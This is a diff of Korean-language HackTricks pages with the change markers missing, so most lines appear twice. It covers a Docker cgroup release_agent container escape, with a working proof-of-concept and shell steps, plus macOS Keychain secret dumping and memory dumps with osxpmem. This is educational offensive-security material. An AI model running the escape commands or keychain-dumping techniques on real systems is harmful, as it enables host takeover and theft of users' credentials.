WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 무료로 시험해 볼 수 있습니다:
그들의 웹사이트를 방문하여 엔진을 **무료로** 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
---
**자세한 내용은 [원본 블로그 게시물](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)을 참조하세요.** 이것은 요약입니다:
**자세한 내용은 [원본 블로그 게시물](https://blog.trailofbits.com/2019/07/19/understanding-docker-container-escapes/)을 참조하십시오.** 이것은 요약입니다:
원본 PoC:
```shell
@ -38,27 +38,27 @@ t=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
touch /o; echo $t/c >$d/release_agent;echo "#!/bin/sh
$1 >$t/o" >/c;chmod +x /c;sh -c "echo 0 >$d/w/cgroup.procs";sleep 1;cat /o
```
**환경 준비:**
**환경 설정 준비:**
- `/tmp/cgrp` 디렉토리를 생성하여 cgroup의 마운트 포인트로 사용합니다.
- RDMA cgroup 컨트롤러를 이 디렉토리에 마운트합니다. RDMA 컨트롤러가 없는 경우 대체로 `memory` cgroup 컨트롤러를 사용하는 것이 좋습니다.
```shell
mkdir /tmp/cgrp && mount -t cgroup -o rdma cgroup /tmp/cgrp && mkdir /tmp/cgrp/x
```
2. **자식 Cgroup 설정:**
- 마운트된 cgroup 디렉토리 내에 "x"라는 이름의 자식 cgroup이 생성됩니다.
- 마운트된 cgroup 디렉토리 내에 "x"라는 자식 cgroup이 생성됩니다.
- "x" cgroup에 대한 알림은 notify_on_release 파일에 1을 쓰는 것으로 활성화됩니다.
```shell
echo 1 > /tmp/cgrp/x/notify_on_release
```
3. **릴리스 에이전트 구성:**
- 호스트에서 컨테이너의 경로는 /etc/mtab 파일에서 얻습니다.
- 그런 다음 cgroup의 release_agent 파일을 구성하여 획득한 호스트 경로에 위치한 /cmd라는 스크립트를 실행합니다.
- 그런 다음 cgroup의 release_agent 파일을 구성하여 획득한 호스트 경로에 위치한 /cmd 스크립트를 실행합니다.
```shell
host_path=`sed -n 's/.*\perdir=\([^,]*\).*/\1/p' /etc/mtab`
echo "$host_path/cmd" > /tmp/cgrp/release_agent
```
4. **/cmd 스크립트 생성 및 구성:**
- /cmd 스크립트는 컨테이너 내에서 생성되며 ps aux를 실행하도록 구성되어 있으며, 출력을 컨테이너 내의 /output이라는 파일로 리다이렉트합니다. 호스트에서 /output의 전체 경로가 지정됩니다.
- /cmd 스크립트는 컨테이너 내부에 생성되고 ps aux를 실행하도록 구성되며, 출력을 컨테이너 내의 /output이라는 파일로 리다이렉트합니다. 호스트에서 /output의 전체 경로가 지정됩니다.
```shell
echo '#!/bin/sh' > /cmd
echo "ps aux > $host_path/output" >> /cmd
@ -70,28 +70,28 @@ chmod a+x /cmd
```shell
sh -c "echo \$\$ > /tmp/cgrp/x/cgroup.procs"
```
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 방문하여 엔진을 **무료**로 사용해 볼 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시험해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**를 통해 제로부터 영웅이 되기까지 AWS 해킹을 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 제로부터 영웅이 되는 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **HackTricks에 귀사를 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)이나 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)**이나 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,25 +2,25 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 AWS 해킹을 배우세요!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 **제로**부터 **히어로**까지 **AWS 해킹**을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나** **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고**되길 원하거나 **PDF로 HackTricks 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 얻으세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 우리의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **HackTricks** 및 **HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)를 **팔로우**하세요.
* **해킹 트릭을 공유**하려면 **HackTricks** 및 **HackTricks Cloud** github 저장소로 PR을 제출하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **스틸러 악성 소프트웨어**에 의해 **침해**되었는지 회사 또는 고객을 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 코드**에 의해 **침해**되었는지 무료로 확인할 수 있는 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도해 볼 수 있습니다:
@ -30,32 +30,32 @@ WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한
## 주요 키체인
* **사용자 키체인** (`~/Library/Keychains/login.keycahin-db`), 애플리케이션 비밀번호, 인터넷 비밀번호, 사용자 생성 인증서, 네트워크 비밀번호 및 사용자 생성 공개/비공개 키와 같은 **사용자별 자격 증명**을 저장하는 데 사용됩니다.
* **시스템 키체인** (`/Library/Keychains/System.keychain`), WiFi 비밀번호, 시스템 루트 인증서, 시스템 비공개 키 및 시스템 애플리케이션 비밀번호와 같은 **시스템 전체 자격 증명**을 저장합니다.
* **사용자 키체인** (`~/Library/Keychains/login.keycahin-db`) 애플리케이션 비밀번호, 인터넷 비밀번호, 사용자 생성 인증서, 네트워크 비밀번호 및 사용자 생성 공개/비공개 키와 같은 **사용자별 자격 증명**을 저장하는 데 사용됩니다.
* **시스템 키체인** (`/Library/Keychains/System.keychain`) WiFi 비밀번호, 시스템 루트 인증서, 시스템 비공개 키 및 시스템 애플리케이션 비밀번호와 같은 **시스템 전체 자격 증명**을 저장합니다.
### 비밀번호 키체인 액세스
이러한 파일들은 본질적인 보호가 없지만 **암호화**되어 있으며 **사용자의 평문 암호가 필요**하여 해독됩니다. [**Chainbreaker**](https://github.com/n0fate/chainbreaker)와 같은 도구를 사용하여 해독할 수 있습니다.
이러한 파일들은 **본질적인 보호가 없지만 다운로드**할 수 있으며 **사용자의 평문 암호가 필요**하여 복호화됩니다. [**Chainbreaker**](https://github.com/n0fate/chainbreaker)와 같은 도구를 사용하여 복호화할 수 있습니다.
## 키체인 항목 보호
### ACLs
키체인의 각 항목은 **액세스 제어 목록 (ACLs)**에 의해 관리되며, 다음을 포함하여 키체인 항목에 대해 다양한 작업을 수행할 수 있는 사용자를 규정합니다:
키체인의 각 항목은 **액세스 제어 목록 (ACLs)**에 의해 관리되며 다음을 포함합니다:
* **ACLAuhtorizationExportClear**: 보유자가 비밀의 평문을 가져올 수 있도록 합니다.
* **ACLAuhtorizationExportWrapped**: 보유자가 다른 제공된 암호로 암호화된 평문을 가져올 수 있도록 합니다.
* **ACLAuhtorizationExportClear**: 보유자가 비밀의 평문을 얻을 수 있도록 합니다.
* **ACLAuhtorizationExportWrapped**: 보유자가 다른 제공된 암호로 암호화된 평문을 얻을 수 있도록 합니다.
* **ACLAuhtorizationAny**: 보유자가 모든 작업을 수행할 수 있도록 합니다.
ACLs는 **프롬프트 없이** 이러한 작업을 수행할 수 있는 **신뢰할 수 있는 응용 프로그램 목록**과 함께 제공됩니다. 이것은 다음과 같을 수 있습니다:
* **`Nil`** (인증이 필요 없음, **모두 신뢰함**)
* **빈** 목록 (**아무도 신뢰하지 않음**)
* 특정 **응용 프로그램** 목록.
* 특정 **응용 프로그램**의 **목록**.
또한 항목에는 **`ACLAuthorizationPartitionID`**라는 키가 포함될 수 있으며, 이는 **teamid, apple,** 및 **cdhash**를 식별하는 데 사용됩니다.
또한 항목에는 **`ACLAuthorizationPartitionID`**가 포함될 수 있으며 **teamid, apple,** 및 **cdhash**를 식별하는 데 사용됩니다.
* **teamid**가 지정된 경우, 항목 값을 **프롬프트 없이** 액세스하려면 사용된 응용 프로그램은 **동일한 teamid**를 가져야 합니다.
* **teamid**가 지정된 경우, **항목에 액세스**하려면 사용된 응용 프로그램은 **동일한 teamid**를 가져야 합니다.
* **apple**이 지정된 경우, 앱은 **Apple**에 의해 **서명**되어야 합니다.
* **cdhash**가 표시된 경우, **앱**은 특정 **cdhash**를 가져야 합니다.
@ -64,15 +64,15 @@ ACLs는 **프롬프트 없이** 이러한 작업을 수행할 수 있는 **신
**`Keychain Access.app`**을 사용하여 **새 항목**을 만들 때 다음 규칙이 적용됩니다:
* 모든 앱은 암호화할 수 있습니다.
* **어떤 앱도** (사용자에게 프롬프트 없이) 내보내기/해독할 수 없습니다.
* **어떤 앱도** 내보낼 수 없거나 복호화할 수 없습니다 (사용자에게 프롬프트 없이).
* 모든 앱은 무결성 검사를 볼 수 있습니다.
* 어떤 앱도 ACL을 변경할 수 없습니다.
* **partitionID**는 **`apple`**로 설정됩니다.
**응용 프로그램이 키체인에 항목을 만드는 경우**, 규칙 약간 다릅니다:
**응용 프로그램이 키체인에 항목을 만드는 경우**, 규칙 약간 다릅니다:
* 모든 앱은 암호화할 수 있습니다.
* 항목을 내보내기/해독할 수 있는 것은 **생성 응용 프로그램** (또는 명시적으로 추가된 다른 앱)만 가능합니다 (사용자에게 프롬프트 없이).
* 항목을 내보 수 있는 것은 **생성 응용 프로그램** (또는 명시적으로 추가된 다른 앱)뿐입니다 (사용자에게 프롬프트 없이).
* 모든 앱은 무결성 검사를 볼 수 있습니다.
* 어떤 앱도 ACL을 변경할 수 없습니다.
* **partitionID**는 **`teamid:[teamID here]`**로 설정됩니다.
@ -93,10 +93,10 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
### API
{% hint style="success" %}
**프롬프트를 생성하지 않는** 비밀을 **열거하고 덤프하는** 것은 [**LockSmith**](https://github.com/its-a-feature/LockSmith) 도구를 사용하여 수행할 수 있습니다.
**프롬프트를 생성하지 않는** **시크릿**의 **키체인 열거 및 덤프**은 [**LockSmith**](https://github.com/its-a-feature/LockSmith) 도구를 사용하여 수행할 수 있습니다.
{% endhint %}
각 키체인 항목에 대한 목록 및 **정보** 가져오기:
각 키체인 항목에 대한 **정보**를 나열하고 가져옵니다:
* API **`SecItemCopyMatching`**은 각 항목에 대한 정보를 제공하며 사용할 때 설정할 수 있는 몇 가지 속성이 있습니다:
* **`kSecReturnData`**: true로 설정하면 데이터를 복호화하려고 시도합니다 (잠재적인 팝업을 피하려면 false로 설정)
@ -107,7 +107,7 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
각 항목의 **ACL** 가져오기:
* API **`SecAccessCopyACLList`**를 사용하 **키체인 항목의 ACL**을 가져올 수 있으며 ACL 목록을 반환합니다 (`ACLAuhtorizationExportClear`와 이전에 언급된 다른 항목과 같은) 각 목록에는 다음이 포함됩니다:
* API **`SecAccessCopyACLList`**를 사용하 **키체인 항목의 ACL**을 가져올 수 있으며 ACL 목록을 반환합니다 (`ACLAuhtorizationExportClear`와 이전에 언급된 다른 항목과 같은) 각 목록에는 다음이 포함됩니다:
* 설명
* **신뢰할 수 있는 애플리케이션 목록**. 이것은 다음과 같을 수 있습니다:
* 앱: /Applications/Slack.app
@ -121,53 +121,53 @@ security set-generic-password-parition-list -s "test service" -a "test acount" -
**프롬프트를 생성하지 않고 비밀을 내보내기** 위한 **요구 사항**은 다음과 같습니다:
* **1개 이상의 신뢰할 수 있는** 앱이 목록에 나열된 경우:
* 적절한 **권한**이 필요합니다 (**`Nil`**, 또는 비밀 정보에 액세스하기 위 권한이 허용된 앱 목록의 일부여야 함)
* **1개 이상의 신뢰할 수 있는** 앱이 목록에 있는 경우:
* 적절한 **권한**이 필요합니다 (**`Nil`**, 또는 비밀 정보에 액세스하기 위 권한이 허용된 앱 목록의 일부여야 함)
* 코드 서명이 **PartitionID**와 일치해야 합니다
* 코드 서명이 **신뢰할 수 있는 앱** 중 하나와 일치해야 합니다 (또는 올바른 KeychainAccessGroup의 구성원이어야 함)
* 코드 서명이 **신뢰할 수 있는 앱**의 것과 일치해야 합니다 (또는 올바른 KeychainAccessGroup의 구성원이어야 함)
* **모든 애플리케이션이 신뢰하는 경우**:
* 적절한 **권한**이 필요합니다
* 코드 서명이 **PartitionID**와 일치해야 합니다
* **PartitionID가 없는 경우** 이는 필요하지 않습니다
{% hint style="danger" %}
따라서, **애플리케이션이 1개 나열된 경우**, 해당 애플리케이션에 **코드를 삽입해야** 합니다.
따라서, **애플리케이션이 1개 나열된 경우**, 해당 애플리케이션에 **코드를 삽입해야** 합니다.
**PartitionID**에 **apple**이 표시된 경우, **`osascript`**를 사용하여 해당 PartitionID에 apple이 포함된 모든 애플리케이션에 신뢰하는 것에 액세스할 수 있습니다. **`Python`**도 이에 사용될 수 있습니다.
**PartitionID**에 **apple**이 표시된 경우, **`osascript`**를 사용하여 해당 PartitionID에 apple이 포함된 모든 애플리케이션에 액세스할 수 있습니다. **`Python`**도 이에 사용될 수 있습니다.
{% endhint %}
### 두 가지 추가 속성
* **Invisible**: UI 키체인 앱에서 항목을 **숨기는** 부울 플래그입니다
* **General**: **메타데이터**를 저장하는 데 사용됩니다 (따라서 **암호화되지 않음**)
* Microsoft는 모든 민감한 엔드포인트에 액세스하기 위한 모든 리프레시 토큰을 평문으로 저장했습니다.
* Microsoft는 민감한 엔드포인트에 액세스하기 위한 모든 리프레시 토큰을 평문으로 저장했습니다.
## 참고 자료
* [**#OBTS v5.0: "Lock Picking the macOS Keychain" - Cody Thomas**](https://www.youtube.com/watch?v=jKE1ZW33JpY)
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 제공되는 검색 엔진으로, 회사 또는 그 고객이 **스틸러 악성 코드**에 의해 **침해**를 받았는지 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 통해 제공되는 검색 엔진으로, 회사 또는 그 고객이 **스틸러 악성 코드**에 의해 **침해**당했는지 확인하는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 대응하는 것입니다.
WhiteIntel의 주요 목표는 정보를 도난당한 악성 코드로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시도할 수 있습니다:
그들의 웹사이트를 방문하여 **무료**로 엔진을 시도해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
<details>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**로부터 **제로**에서 **히어로**까지 AWS 해킹 배우기</strong></summary>
<summary><strong>**htARTE (HackTricks AWS Red Team Expert)**로부터 AWS 해킹을 처음부터 전문가까지 배우세요</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 PDF로 다운로드하려면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사 광고를 보거나 PDF로 HackTricks를 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구입하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* 💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live) **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>

View file

@ -2,27 +2,27 @@
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong></summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)를 통해 AWS 해킹을 제로부터 전문가까지 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team Expert)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에서 광고하거나 HackTricks를 PDF로 다운로드**하고 싶다면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* **회사가 HackTricks에 광고되길 원하거나** **PDF 형식의 HackTricks를 다운로드하길 원한다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 요령을 공유**하세요.
</details>
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, **회사 또는 고객이 **stealer malwares**에 의해 **침해**당했는지를 확인하는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, **회사나 고객이** **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보 도난당한 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
WhiteIntel의 주요 목표는 정보 도난 악성 소프트웨어로 인한 계정 탈취 및 랜섬웨어 공격을 막는 것입니다.
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
그들의 웹사이트를 확인하고 **무료**로 엔진을 시해 볼 수 있습니다:
{% embed url="https://whiteintel.io" %}
@ -32,25 +32,25 @@ WhiteIntel의 주요 목표는 정보를 도난당한 악성 소프트웨어로
### 스왑 파일
`/private/var/vm/swapfile0`와 같은 스왑 파일은 **물리 메모리가 가득 찼을 때 캐시로 작동**합니다. 물리 메모리에 더 이상 공간이 없을 때, 해당 데이터는 스왑 파일로 전송되고 필요할 때 다시 물리 메모리로 가져옵니다. swapfile0, swapfile1 등과 같은 이름의 여러 스왑 파일이 존재할 수 있습니다.
`/private/var/vm/swapfile0`와 같은 스왑 파일은 **물리 메모리가 가득 찼을 때 캐시로 작동**합니다. 물리 메모리에 더 이상 공간이 없을 때 해당 데이터는 스왑 파일로 전송되고 필요할 때 다시 물리 메모리로 가져옵니다. swapfile0, swapfile1 등과 같은 이름의 여러 스왑 파일이 존재할 수 있습니다.
### 휴면 이미지
`/private/var/vm/sleepimage`에 위치한 파일은 **휴면 모드** 중에 중요합니다. **OS X가 휴면 상태일 때 메모리 데이터가 이 파일에 저장**됩니다. 컴퓨터를 깨우면 시스템이 이 파일에서 메모리 데이터를 검색하여 사용자가 중단한 곳에서 계속할 수 있게 합니다.
현대 MacOS 시스템에서는 이 파일이 일반적으로 보안상의 이유로 암호화되어 복구가 어려워집니다.
현대 MacOS 시스템에서는 이 파일이 일반적으로 보안상의 이유로 암호화되어 복구가 어려울 수 있음을 유의해야 합니다.
* `sysctl vm.swapusage` 명령을 실행하여 sleepimage에 대한 암호화가 활성화되었는지 확인할 수 있습니다. 이를 통해 파일이 암호화되었는지 확인할 수 있습니다.
### 메모리 압력 로그
MacOS 시스템에서 또 다른 중요한 메모리 관련 파일은 **메모리 압력 로그**입니다. 이 로그는 `/var/log`에 위치하며 시스템의 메모리 사용량 및 압력 이벤트에 대한 자세한 정보를 포함합니다. 이는 메모리 관련 문제를 진단하거나 시스템이 시간이 지남에 따라 메모리를 관리하는 방을 이해하는 데 유용할 수 있습니다.
MacOS 시스템에서 또 다른 중요한 메모리 관련 파일은 **메모리 압력 로그**입니다. 이 로그는 `/var/log`에 위치하며 시스템의 메모리 사용량 및 압력 이벤트에 대한 상세한 정보를 포함하고 있습니다. 이 로그는 메모리 관련 문제를 진단하거나 시스템이 시간이 지남에 따라 메모리를 관리하는 방을 이해하는 데 유용할 수 있습니다.
## osxpmem을 사용한 메모리 덤프
MacOS 기기에서 메모리를 덤프하려면 [**osxpmem**](https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-2.1.post4.zip)를 사용할 수 있습니다.
**참고**: 다음 지침은 Intel 아키텍처를 사용하는 Mac에만 적용됩니다. 이 도구는 현재 보관 중이며 마지막 릴리스는 2017년에 있었습니다. 아래 지침을 사용하여 다운로드한 이진 파일은 Apple Silicon이 2017년에 없었기 때문에 Intel 칩을 대상으로 합니다. arm64 아키텍처용으로 바이너리를 컴파일하는 것이 가능할 수 있지만 직접 시도해봐야 합니다.
**참고**: 아래 지침은 인텔 아키텍처를 사용하는 Mac에만 적용됩니다. 이 도구는 현재 보관 중이며 마지막 릴리스는 2017년에 있었습니다. 아래 지침을 사용하여 다운로드한 이진 파일은 Apple Silicon이 2017년에 없었기 때문에 인텔 칩을 대상으로 합니다. arm64 아키텍처용 이진 파일을 컴파일할 수도 있지만 직접 시도해야 합니다.
```bash
#Dump raw format
sudo osxpmem.app/osxpmem --format raw -o /tmp/dump_mem
@ -76,11 +76,11 @@ cd /tmp; wget https://github.com/google/rekall/releases/download/v1.5.1/osxpmem-
```
{% endcode %}
## WhiteIntel
### [WhiteIntel](https://whiteintel.io)
<figure><img src=".gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
<figure><img src="/.gitbook/assets/image (1224).png" alt=""><figcaption></figcaption></figure>
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 기반으로 한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인할 수 있는 **무료** 기능을 제공합니다.
[**WhiteIntel**](https://whiteintel.io)은 **다크 웹**을 활용한 검색 엔진으로, 회사나 그 고객이 **스틸러 악성 소프트웨어**에 의해 **침해**당했는지 확인는 **무료** 기능을 제공합니다.
WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로 인한 계정 탈취와 랜섬웨어 공격을 막는 것입니다.
@ -90,14 +90,14 @@ WhiteIntel의 주요 목표는 정보를 도난하는 악성 소프트웨어로
<details>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 제로부터 AWS 해킹을 배우세요!</summary>
<summary><strong>htARTE (HackTricks AWS Red Team Expert)</strong>를 통해 제로부터 영웅이 되는 AWS 해킹을 배우세요!</summary>
HackTricks를 지원하는 다른 방법:
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**SUBSCRIPTION PLANS**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* 💬 [**Discord 그룹**](https://discord.gg/hRep4RUj7f) 또는 [**텔레그램 그룹**](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** github 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
* **회사를 HackTricks에 광고하거나 HackTricks를 PDF로 다운로드**하려면 [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 저희의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [**디스코드 그룹**](https://discord.gg/hRep4RUj7f)이나 [**텔레그램 그룹**](https://t.me/peass)에 가입하거나**트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **HackTricks****HackTricks Cloud** 깃허브 저장소에 PR을 제출하여 **해킹 트릭을 공유**하세요.
</details>

View file

@ -2,23 +2,23 @@
<details>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹을 배우세요</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team 전문가)</strong></a><strong>와 함께!</strong></summary>
<summary><strong>제로부터 영웅이 될 때까지 AWS 해킹 배우기</strong> <a href="https://training.hacktricks.xyz/courses/arte"><strong>htARTE (HackTricks AWS Red Team 전문가)</strong></a><strong>!</strong></summary>
HackTricks를 지원하는 다른 방법:
* **회사가 HackTricks에 광고되길 원하거나 HackTricks를 PDF로 다운로드하길 원한다면** [**구독 요금제**](https://github.com/sponsors/carlospolop)를 확인하세요!
* [**공식 PEASS & HackTricks 굿즈**](https://peass.creator-spring.com)를 구매하세요
* [**공식 PEASS & HackTricks 스왜그**](https://peass.creator-spring.com)를 구매하세요
* [**The PEASS Family**](https://opensea.io/collection/the-peass-family)를 발견하세요, 당사의 독점 [**NFTs**](https://opensea.io/collection/the-peass-family) 컬렉션
* **💬 [Discord 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
* **💬 [디스코드 그룹](https://discord.gg/hRep4RUj7f)** 또는 [텔레그램 그룹](https://t.me/peass)에 **가입**하거나 **트위터** 🐦 [**@carlospolopm**](https://twitter.com/hacktricks_live)을 **팔로우**하세요.
